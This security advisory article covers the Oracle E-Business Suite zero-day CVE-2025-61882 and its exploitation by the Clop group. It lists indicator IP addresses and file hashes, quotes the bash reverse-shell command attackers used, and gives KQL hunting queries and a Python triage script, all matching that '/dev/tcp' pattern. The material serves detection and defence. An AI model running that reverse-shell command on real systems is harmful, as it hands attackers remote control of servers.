
Oracle EBS zero-day CVE-2025-61882 exploited in Clop ransomware data theft attacks

Oracle has issued an emergency alert regarding a critical unauthenticated remote code execution (RCE) vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The flaw, residing in the BI Publisher Integration component of Oracle Concurrent Processing, has been actively exploited by the Clop ransomware group in targeted data theft attacks as recently as August 2025.

The flaw, which carries a CVSS score of 9.8, affects Oracle EBS versions 12.2.3 through 12.2.14. Oracle has now confirmed the attacks and has shared specific Indicators of Compromise (IOCs), including two malicious IP addresses used to deliver the payload and exfiltrate data.


Key Indicators of Exploitation

Oracle has published technical indicators linked to the active exploitation of this vulnerability. Two specific IP addresses have been observed delivering HTTP GET and POST requests to vulnerable Oracle EBS systems:

  • 200.107.207.26
  • 185.181.60.11

These IPs are believed to be associated with Clop’s infrastructure and were used to deliver Python-based reverse shell payloads or directly execute commands on targeted systems.

Reverse Shell Command

Attackers deployed the following shell command via the exploit:

sh -c /bin/bash -i >& /dev/tcp/[malicious_IP]/[port] 0>&1

This command establishes a reverse shell, enabling attackers to take remote control of the server.

Exploit Files Identified

Oracle has listed the following SHA-256 hashes for the exploit archive and Python scripts used:

  • Exploit ZIP Archive:
    76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
  • Python Scripts Inside ZIP:
    aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py)
    6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)

Threat Actor Attribution

The attacks have been attributed to the Clop ransomware gang, known for exploiting zero-days in major data exfiltration campaigns (Accellion, MOVEit, GoAnywhere, etc.). However, the initial leak of the Oracle exploit appears to originate from a new group calling themselves “Scattered Lapsus$ Hunters”, who shared the toolset on Telegram and referenced Clop in the archive’s filename.

While the precise relationship between Clop and Scattered Lapsus$ Hunters remains unclear, the exploit’s leak suggests possible collaboration, code sharing, or resale between threat actors.


Detection: KQL Query for Microsoft Defender & Sentinel

Security teams using Microsoft Defender for Endpoint or Microsoft Sentinel can use the following KQL (Kusto Query Language) to detect suspicious activity associated with the Oracle EBS exploit:

DeviceNetworkEvents
| where RemoteIP in ("200.107.207.26", "185.181.60.11")
  and ActionType in ("ConnectionSuccess", "ConnectionAttempt", "InboundConnectionAccepted")
| summarize EventCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteIP, InitiatingProcessFileName, ReportId
| order by LastSeen desc

🔍 Purpose: Detects any successful or attempted connections to the two malicious IPs from endpoints in your environment.

For deeper inspection of reverse shell behavior and payloads:

DeviceProcessEvents
| where ProcessCommandLine has_all ("bash", "/dev/tcp")
  or ProcessCommandLine contains "/bin/bash -i >& /dev/tcp"
| summarize EventCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, InitiatingProcessFileName, ProcessCommandLine
| order by LastSeen desc

🎯 Purpose: Detects execution of reverse shell commands typically used in this Oracle EBS exploit.
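For teams that export telemetry rather than query it live, the two KQL hunts above and the SHA-256 list under "Exploit Files Identified" can be reproduced offline. The script below is an added example, not code from Oracle or from the original article: it parses constructed JSON-lines events (sample data only, not real telemetry; the destination IP in the sample command line is a documentation-range address), flags connections to the two published IPs and process launches matching the reverse-shell substrings, summarizes per device with first/last seen exactly as the `summarize` clauses do, and checks file contents against the published hashes. Field names follow the Defender tables used in the queries; the `Table` field and the helper names are assumptions for this example.

```python
"""Offline triage helper mirroring the two KQL queries on this page.

Added example; not part of the original article or Oracle's advisory.
Sample events are constructed for illustration and are not real telemetry.
"""
from collections import defaultdict
from datetime import datetime
import hashlib
import json

# IoCs exactly as published on this page (from Oracle's advisory).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",  # exploit ZIP
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",  # exp.py
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",  # server.py
}
# Same ActionType filter as the first KQL query.
NET_ACTIONS = {"ConnectionSuccess", "ConnectionAttempt", "InboundConnectionAccepted"}
# Substrings from the second KQL query; both must appear in the command line.
SHELL_PATTERNS = ("/dev/tcp", "bash -i")

# Constructed sample telemetry in JSON lines (assumed export format; not real data).
SAMPLE_EVENTS = """\
{"Table":"DeviceNetworkEvents","Timestamp":"2025-08-12T09:14:03Z","DeviceName":"ebs-app-01","RemoteIP":"200.107.207.26","ActionType":"ConnectionSuccess","InitiatingProcessFileName":"bash"}
{"Table":"DeviceNetworkEvents","Timestamp":"2025-08-12T09:15:40Z","DeviceName":"ebs-app-01","RemoteIP":"200.107.207.26","ActionType":"ConnectionSuccess","InitiatingProcessFileName":"python3"}
{"Table":"DeviceNetworkEvents","Timestamp":"2025-08-12T09:16:00Z","DeviceName":"ebs-app-02","RemoteIP":"10.0.0.5","ActionType":"ConnectionSuccess","InitiatingProcessFileName":"java"}
{"Table":"DeviceNetworkEvents","Timestamp":"2025-08-12T09:17:00Z","DeviceName":"ebs-app-02","RemoteIP":"185.181.60.11","ActionType":"ConnectionFailed","InitiatingProcessFileName":"curl"}
{"Table":"DeviceProcessEvents","Timestamp":"2025-08-12T09:14:01Z","DeviceName":"ebs-app-01","InitiatingProcessFileName":"java","ProcessCommandLine":"sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"}
{"Table":"DeviceProcessEvents","Timestamp":"2025-08-12T09:20:00Z","DeviceName":"ebs-app-02","InitiatingProcessFileName":"bash","ProcessCommandLine":"python3 /opt/backup/rotate.py"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ts(event):
    return datetime.strptime(event["Timestamp"], "%Y-%m-%dT%H:%M:%SZ")


def _summarize(hits):
    """Equivalent of `summarize count(), min(Timestamp), max(Timestamp) by ...`
    followed by `order by LastSeen desc`."""
    rows = [
        {"key": key, "EventCount": len(ts), "FirstSeen": min(ts), "LastSeen": max(ts)}
        for key, ts in hits.items()
    ]
    rows.sort(key=lambda r: r["LastSeen"], reverse=True)
    return rows


def hunt_network(events):
    """First KQL query: connections to IoC IPs, grouped by
    (DeviceName, RemoteIP, InitiatingProcessFileName)."""
    hits = defaultdict(list)
    for ev in events:
        if ev.get("Table") != "DeviceNetworkEvents":
            continue
        if ev["RemoteIP"] in IOC_IPS and ev["ActionType"] in NET_ACTIONS:
            key = (ev["DeviceName"], ev["RemoteIP"], ev["InitiatingProcessFileName"])
            hits[key].append(_ts(ev))
    return _summarize(hits)


def hunt_shell(events):
    """Second KQL query: command lines carrying the reverse-shell substrings,
    grouped by (DeviceName, InitiatingProcessFileName, ProcessCommandLine)."""
    hits = defaultdict(list)
    for ev in events:
        if ev.get("Table") != "DeviceProcessEvents":
            continue
        cmd = ev["ProcessCommandLine"]
        if all(p in cmd for p in SHELL_PATTERNS):
            key = (ev["DeviceName"], ev["InitiatingProcessFileName"], cmd)
            hits[key].append(_ts(ev))
    return _summarize(hits)


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def match_hashes(files, iocs=IOC_SHA256):
    """Return the names of files whose SHA-256 is in the IoC set.
    `files` maps a name to the file's bytes (read from disk in real use)."""
    return sorted(name for name, data in files.items() if sha256_hex(data) in iocs)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for row in hunt_network(evs) + hunt_shell(evs):
        print(row)
```

Note that the sample deliberately contains a failed connection to 185.181.60.11, which the original query's ActionType filter (and this mirror of it) drops; when hunting historical logs it is worth widening that filter to include failed and blocked attempts, since a blocked outbound connection to an IoC address is still evidence that something on the host tried to reach it.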


Recommended Actions

Patch Immediately

Admins must install the October 2023 CPU (Critical Patch Update) before applying the emergency fix for CVE-2025-61882.

Hunt & Monitor

Use the above KQL queries to search historical logs for signs of compromise or ongoing exploitation.

Harden Oracle EBS

  • Isolate Oracle EBS from internet exposure where possible
  • Apply strict network ACLs
  • Enable detailed logging and alerting on shell access, Python scripts, and unusual network connections

Block Malicious IPs

Immediately block outbound/inbound connections to:

  • 200.107.207.26
  • 185.181.60.11

Conclusion

The exploitation of CVE-2025-61882 represents a high-risk, active threat to Oracle E-Business Suite deployments. Organizations using vulnerable versions must prioritize patching and proactively monitor for suspicious access attempts. Clop’s continued use of zero-days and sophisticated supply-chain tactics underscores the urgent need for zero-trust segmentation, rapid patch cycles, and threat hunting capabilities in enterprise environments.
